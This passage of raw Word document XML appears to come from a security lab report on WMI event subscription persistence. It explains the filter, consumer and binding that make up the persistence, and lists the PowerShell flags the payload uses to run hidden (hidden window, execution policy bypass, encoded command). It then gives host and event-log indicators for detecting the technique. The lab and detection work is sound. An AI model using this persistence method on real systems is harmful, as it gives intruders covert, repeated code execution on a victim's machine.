          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>__EventFilter – Defines the trigger condition using WQL (fires every 60 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77AA56DF" w:rsidP="002E72EC" w:rsidRDefault="77AA56DF" w14:paraId="307682A1" w14:textId="375CDD6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>CommandLineEventConsumer – Executes a hidden PowerShell command (encoded payload)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77AA56DF" w:rsidP="002E72EC" w:rsidRDefault="77AA56DF" w14:paraId="2FC66E71" w14:textId="33284BB6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>__FilterToConsumerBinding – Binds the filter to the consumer to activate persistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77AA56DF" w:rsidP="77AA56DF" w:rsidRDefault="77AA56DF" w14:paraId="7CFF6B4E" w14:textId="4905A12E">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As a result, PowerShell executes automatically at the defined interval.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77AA56DF" w:rsidP="77AA56DF" w:rsidRDefault="2B759FBA" w14:paraId="2FC33BB2" w14:textId="404BC458">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
        <w:t>Commands / Steps Observed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Victim – Windows VM, Admin PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DCFEF5" w:rsidP="0D187993" w:rsidRDefault="1655632F" w14:paraId="05979962" w14:textId="2E4C9D21">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7811B252" wp14:editId="51CE04BC">
            <wp:extent cx="5829300" cy="2200275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20508270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27080" name="Picture 2050827080"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="2200275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A PowerShell script was executed to create:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DCFEF5" w:rsidP="002E72EC" w:rsidRDefault="42DCFEF5" w14:paraId="56E9D98C" w14:textId="538C3F3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Filter: DemoSystemUpdateFilter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DCFEF5" w:rsidP="002E72EC" w:rsidRDefault="42DCFEF5" w14:paraId="4A548906" w14:textId="7037365F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Consumer: DemoSystemUpdateConsumer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DCFEF5" w:rsidP="002E72EC" w:rsidRDefault="42DCFEF5" w14:paraId="0FF70E51" w14:textId="63928667">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Binding between the two objects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DCFEF5" w:rsidP="42DCFEF5" w:rsidRDefault="42DCFEF5" w14:paraId="6BEC86DA" w14:textId="5BF1D9E6">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The payload uses PowerShell with stealthy parameters such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DCFEF5" w:rsidP="002E72EC" w:rsidRDefault="42DCFEF5" w14:paraId="08CD38C5" w14:textId="340574B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>-WindowStyle Hidden</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DCFEF5" w:rsidP="002E72EC" w:rsidRDefault="42DCFEF5" w14:paraId="0C54BFB6" w14:textId="2BAF0BB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>-ExecutionPolicy Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="42DCFEF5" w:rsidP="002E72EC" w:rsidRDefault="42DCFEF5" w14:paraId="65C00CE3" w14:textId="1062D52B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>-enc (Base64 encoded command)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32AED7DE" w:rsidP="32AED7DE" w:rsidRDefault="32AED7DE" w14:paraId="261015C1" w14:textId="7185E979">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Expected outcome / impact:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="08306DFE" w:rsidP="08306DFE" w:rsidRDefault="08306DFE" w14:paraId="3657B647" w14:textId="1C348BB6">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The WMI subscription remains present in root\subscription</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="08306DFE" w:rsidP="08306DFE" w:rsidRDefault="08306DFE" w14:paraId="195CD1AB" w14:textId="1FF05688">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PowerShell launches automatically at intervals without user interaction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1655632F" w:rsidP="03776377" w:rsidRDefault="08306DFE" w14:paraId="4609A54E" w14:textId="4792B811">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If payload is network-based, the endpoint may attempt repeated outbound connections (callback behavior)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="0277C67B" w14:textId="41AEB0E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896696" w:id="43"/>
      <w:commentRangeStart w:id="44"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Detection / IOCs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:commentRangeEnd w:id="44"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="44"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="6EFC9E73" w:rsidRDefault="6EFC9E73" w14:paraId="3AF7A2BA" w14:textId="358CB128">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896697" w:id="45"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>A) Host-based IOCs (WMI Persistence Footprint)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="6EFC9E73" w:rsidRDefault="6EFC9E73" w14:paraId="738B37BB" w14:textId="32BE91A2">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Where to check: root\subscription</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="6EFC9E73" w:rsidRDefault="6EFC9E73" w14:paraId="17A31F7F" w14:textId="74265F22">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key objects indicating compromise:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="6EFC9E73" w14:paraId="0D6DA3E6" w14:textId="02D3ACB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>__EventFilter (example name: DemoSystemUpdateFilter)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="6EFC9E73" w14:paraId="0C0B6ED5" w14:textId="5FC8F6B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>CommandLineEventConsumer (example name: DemoSystemUpdateConsumer)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="6EFC9E73" w14:paraId="077A7257" w14:textId="1DF75026">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>__FilterToConsumerBinding linking the above</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="6EFC9E73" w:rsidRDefault="6EFC9E73" w14:paraId="49376713" w14:textId="0D21DC3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Strong IOC:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The consumer’s stored command line contains suspicious PowerShell flags:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="6EFC9E73" w14:paraId="1AC2E49A" w14:textId="766310FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>-WindowStyle Hidden</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="6EFC9E73" w14:paraId="77A7CAC6" w14:textId="4414B015">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>-ExecutionPolicy Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="6EFC9E73" w14:paraId="0B89F803" w14:textId="30714D51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>-enc / -EncodedCommand</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="06094D31" w:rsidRDefault="6EFC9E73" w14:paraId="42A831DA" w14:textId="7561F8B1">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>These are commonly used to hide execution and evade basic detection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="6EFC9E73" w:rsidRDefault="6EFC9E73" w14:paraId="286035FF" w14:textId="16BF8FCD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896698" w:id="46"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>B) Windows Event Logs (supporting evidence)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="6EFC9E73" w:rsidRDefault="6EFC9E73" w14:paraId="34E75EF2" w14:textId="4197772E">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Depending on what is enabled on the endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="6EFC9E73" w14:paraId="3E8C3DEE" w14:textId="12551361">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Microsoft-Windows-WMI-Activity/Operational</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look for WMI activity related to subscription execution or access to root\subscription.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="6EFC9E73" w14:paraId="6EF22736" w14:textId="2813C966">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Security Event ID 4688 (Process Creation) (if enabled)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look for powershell.exe launched with encoded command flags.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="6EFC9E73" w14:paraId="7AB19B2B" w14:textId="476FD317">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Sysmon (if enabled)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6EFC9E73" w:rsidP="002E72EC" w:rsidRDefault="6EFC9E73" w14:paraId="03145FFD" w14:textId="0CBF729A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
